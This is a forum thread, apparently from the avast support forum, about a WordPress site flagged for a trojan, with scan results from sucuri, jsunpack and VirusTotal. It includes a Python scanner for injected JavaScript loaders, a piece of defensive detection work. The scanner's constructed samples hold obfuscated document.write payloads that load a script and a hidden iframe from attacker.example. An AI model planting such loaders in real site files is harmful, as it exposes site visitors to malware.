I have a website wxw.msolarpro.com. When I go to the site I get an avast! Web Shield "blocked trojan horse" message. I Googled the trojan and didn't find out how to eradicate it. What caused it? Is it a false positive from Web Shield?
Any help here?
I see we are going to have to exercise care in giving links to the results in sucuri.net, as the web shield has just alerted on that set of results, presumably because the example of the actual script, document . write, gives the web shield a fit.
I said what I believe happened: sucuri displays the code extracted from the suspect site, and the web shield detects it in the same way it would on the original site.
This happens when you are using some analysis sites, as the extra information they give on what is found is a copy of what is on the site. I have a number of exclusions for some analysis sites.
It is just that in the past sucuri didn't display the page link to the results, so we had to post an image of the information. Now that it does, those visiting the results page could well get a shock.
The Norman attitude is strange to me, as the site itself has been hacked (WordPress files; I don't know if it is an old vulnerable version being exploited), regardless of whether the remote source is up at the time it is checked, as there is nothing to stop the remote site becoming active.
Well, this is flagged as suspicious by avast as JS:ScriptDC-inf[Trj] for the jsunpack analysis of the mentioned site:
-www.msolarpro.com/wp-content/plugins/dropdown-menu-widget/scripts/include.js?ver=3.2 suspicious
[suspicious:2] (ipaddr:184.154.88.218) (script) -www.msolarpro.com/wp-content/plugins/dropdown-menu-widget/scripts/include.js?ver=3.2
status: (referer=-www.msolarpro.com/)saved 386 bytes 8312b9b0c984c54fbc8feaf66bcb4b1dd3acaf58
info: [decodingLevel=0] found JavaScript
Avast webshield flags -www.msolarpro.com/wp-includes/js/l10n.js?ver=20101110
But to Pondus, also have a look here for a second opinion: http://forum.avast.com/index.php?action=printpage;topic=83287.0 where a false positive was found, and the IP also had an instance of HTML/Redirector.MA on it (now dead).
Also consider this VT scan: https://www.virustotal.com/url/b417c30323119157b1261a38567c6b62c55941dd22dade7bc984be07d0f1068e/analysis/1327015879/ (detection from Bitdefender, but TrafficLight does not list it).
We can conclude that the dents of the avast web shield really dig that deep, my good forum friends, as I have explained and demonstrated above in my explanation of the website scan analysis. Yes, I repeat this again: the avast web shield, notwithstanding the status of the exploit found, is an awesome and formidable protection tool.
I think the avast point of view is the right one here. As long as the website code stays exploitable and the software is not fully patched, reinfection stays an imminent threat.
As long as the web client can no longer be infected, we could conclude the block could be lifted.
So Norman says the malcode is no longer up or responding, so the site is safe to be visited by the user.
This attitude towards the issue is rounding the bends by a mile, so to say.
Better is to lift website blocking when the website is secure for both the user and the website owner/website hoster/webmaster: the software code has been fully patched, the exploit code cleansed, and all measures taken to prevent re-infection. One such action could be as easy as no longer giving away the full server software version, etc.
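The posts above talk about an injected document.write loader sitting in a plugin .js file, and about jsunpack only reaching decodingLevel=0 on it. As an added example (not code from this thread, from Avast, sucuri or jsunpack), here is a small Python heuristic scanner a site owner can run over a WordPress tree to find such appended loaders before and after cleaning. The indicator set and thresholds are assumptions of this example, not any vendor's signatures; the sample files, the hosts attacker.example and ads.example.net, and the site host www.example.com are constructed for the demonstration.

```python
"""Heuristic scan of JavaScript files for injected loader code.

Added example, not code from the thread or from Avast/sucuri/jsunpack. The
indicators are an assumption: the document.write() injection mentioned in the
thread plus the usual ways such payloads are hidden (percent-encoding behind
unescape(), String.fromCharCode(), eval of a decoded string, 0/1 pixel iframes).
Treat hits as leads for manual review, not as verdicts.
"""
import os
import re
from urllib.parse import unquote, urlparse

# Quoted string literal; an unpaired apostrophe in a comment can mis-pair
# literals, which only weakens the heuristic, it never crashes it.
STRING_LITERAL = re.compile(r"""(['"])((?:\\.|(?!\1).)*)\1""", re.S)
PERCENT_BYTE = re.compile(r"%[0-9A-Fa-f]{2}")
CHARCODE_CALL = re.compile(r"String\.fromCharCode\s*\(([\d\s,]+)\)")
MARKUP = re.compile(r"<\s*(?:script|iframe)\b", re.I)
SRC_URL = re.compile(r"""<\s*(?:script|iframe)[^>]*\bsrc\s*=\s*['"]?\s*((?:https?:)?//[^'"\s>]+)""", re.I)
TINY_IFRAME = re.compile(r"""<\s*iframe[^>]*\b(?:width|height)\s*=\s*['"]?\s*[01]\b""", re.I)
DOC_WRITE = re.compile(r"document\.write(?:ln)?\s*\(")
EVAL_DECODE = re.compile(r"\beval\s*\(\s*(?:unescape|decodeURIComponent)\s*\(")


def decode_one_level(js):
    """One decoding pass (what jsunpack reports as decodingLevel=1): return the
    plaintext hidden in percent-encoded string literals and in
    String.fromCharCode(...) argument lists. Nested layers would need a loop."""
    parts = []
    for m in STRING_LITERAL.finditer(js):
        body = m.group(2)
        if len(PERCENT_BYTE.findall(body)) >= 4:  # threshold is an assumption
            parts.append(unquote(body))
    for m in CHARCODE_CALL.finditer(js):
        codes = [int(n) for n in re.findall(r"\d+", m.group(1))]
        parts.append("".join(chr(c) for c in codes if c < 0x110000))
    return "\n".join(parts)


def third_party_hosts(text, site_host):
    """Hosts, other than the site itself, that written-out tags would load from."""
    hosts = set()
    for m in SRC_URL.finditer(text):
        url = m.group(1)
        if url.startswith("//"):
            url = "http:" + url
        host = (urlparse(url).hostname or "").lower()
        if host and host != site_host.lower():
            hosts.add(host)
    return sorted(hosts)


def scan_js(js, site_host):
    """Return ({indicator: description}, [third-party hosts]) for one file."""
    decoded = decode_one_level(js)
    combined = js + "\n" + decoded
    findings = {}
    if DOC_WRITE.search(js) and MARKUP.search(combined):
        findings["document_write_markup"] = "document.write() emits <script>/<iframe>"
    if MARKUP.search(decoded) and not MARKUP.search(js):
        findings["markup_only_after_decoding"] = "tag hidden behind unescape()/fromCharCode()"
    if EVAL_DECODE.search(js):
        findings["eval_of_decoded_string"] = "eval(unescape(...)) style loader"
    if TINY_IFRAME.search(combined):
        findings["tiny_iframe"] = "0/1 pixel iframe"
    lines = [ln for ln in js.splitlines() if ln.strip()]
    if lines and len(lines[-1]) > 500:  # appended one-line payload; limit is an assumption
        findings["long_trailing_line"] = "last line is %d chars" % len(lines[-1])
    return findings, third_party_hosts(combined, site_host)


def scan_tree(root, site_host):
    """Walk a WordPress install (wp-content, wp-includes) and report every .js
    file that has at least one indicator."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".js"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings, hosts = scan_js(fh.read(), site_host)
                if findings:
                    report[path] = (findings, hosts)
    return report


# Constructed samples (not files from the site discussed in the thread).
PLUGIN_CLEAN = """jQuery(document).ready(function($) {
  $('.dropdown-menu li').hover(function() { $(this).addClass('hover'); });
});
"""
# A legitimate ad loader also uses document.write(); it trips the first
# indicator, which is exactly the false-positive shape the thread describes.
AD_LOADER = PLUGIN_CLEAN + "document.write('<script src=\"//ads.example.net/ad.js?size=300x250\"></script>');\n"
INJECTED_UNESCAPE = PLUGIN_CLEAN + (
    "document.write(unescape('%3Cscript%20src%3D%22http%3A//attacker.example/c.js%22%3E%3C/script%3E'));\n")
_IFRAME = '<iframe src="http://attacker.example/i.html" width=1 height=1></iframe>'
INJECTED_CHARCODE = PLUGIN_CLEAN + "document.write(String.fromCharCode({}));\n".format(
    ",".join(str(ord(c)) for c in _IFRAME))

if __name__ == "__main__":
    for label, sample in [("clean", PLUGIN_CLEAN), ("ad loader", AD_LOADER),
                          ("unescape", INJECTED_UNESCAPE), ("fromCharCode", INJECTED_CHARCODE)]:
        print(label, scan_js(sample, "www.example.com"))
```

The useful signal is the combination: markup that only appears after decoding, on a host the owner does not recognise, is far more likely to be an injection than a plain document.write of an ad tag, which is why the third-party host list is returned alongside the indicators for the owner to vet. Run scan_tree on the web root before cleaning, keep the report, and run it again afterwards; a file that still reports indicators has not been cleaned, and a previously clean file that starts reporting them is the reinfection the posts above warn about.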
I thank you all for the help you have provided. I read the replies; however, I did not understand all of what was discussed. Does '/sitecheck.sucuri.net/results/' clean the infected code or just inform of the infection?
Where does my website stand at this time, as far as the avast program is concerned?
I do not get an avast alert now. This still could be patched: -www.msolarpro.com/wp-content/plugins/dropdown-menu-widget/scripts/include.js?ver=3.2 suspicious
[suspicious:2] (ipaddr:184.154.88.218) -www.msolarpro.com/wp-content/plugins/dropdown-menu-widget/scripts/include.js?ver=3.2
status: (referer=-www.google.com/trends/hottrends)saved 16949 bytes 91588590e403cf96232b117e04289bbc21b898be
info: [script] -www.msolarpro.com/wp-includes/js/jquery/jquery.js?ver=1.7.1
info: [script] -www.msolarpro.com/wp-content/plugins/brainhost-plugin/script.js?ver=1.0
info: [script] -www.brainhost.com/ads/ad.js?size=300x250
info: [script] -www.brainhost.com/ads/ad.js?size=120x600
info: [script] -www.msolarpro.com/wp-includes/js/thickbox/thickbox.js?ver=3.1-20111117
info: [decodingLevel=0] found JavaScript
suspicious: maxruntime exceeded 10 seconds (incomplete) 0 bytes
info
No particulars now here: http://wepawet.iseclab.org/view.php?hash=fc212bf7576cae45a08415e6b278b2e8&t=1327169129&type=js
In its results it is only showing what it considers infected/suspect; it won't clean it, as that in itself would be hacking if someone could ask it to check the site out and that resulted in changes unknown to the owner.
Any cleaning is down to the site owner; it does, however, offer service plans to clean up sites. I have never used any of their services, though. The one-site clean-up premium service plan does seem reasonably good value, though: http://sucuri.net/signup.
I don't get an alert visiting your site using Firefox 9.0.1.
So it would appear that something has been updated/cleaned up in regard to the WordPress files, as sucuri no longer flags it as infected; see image.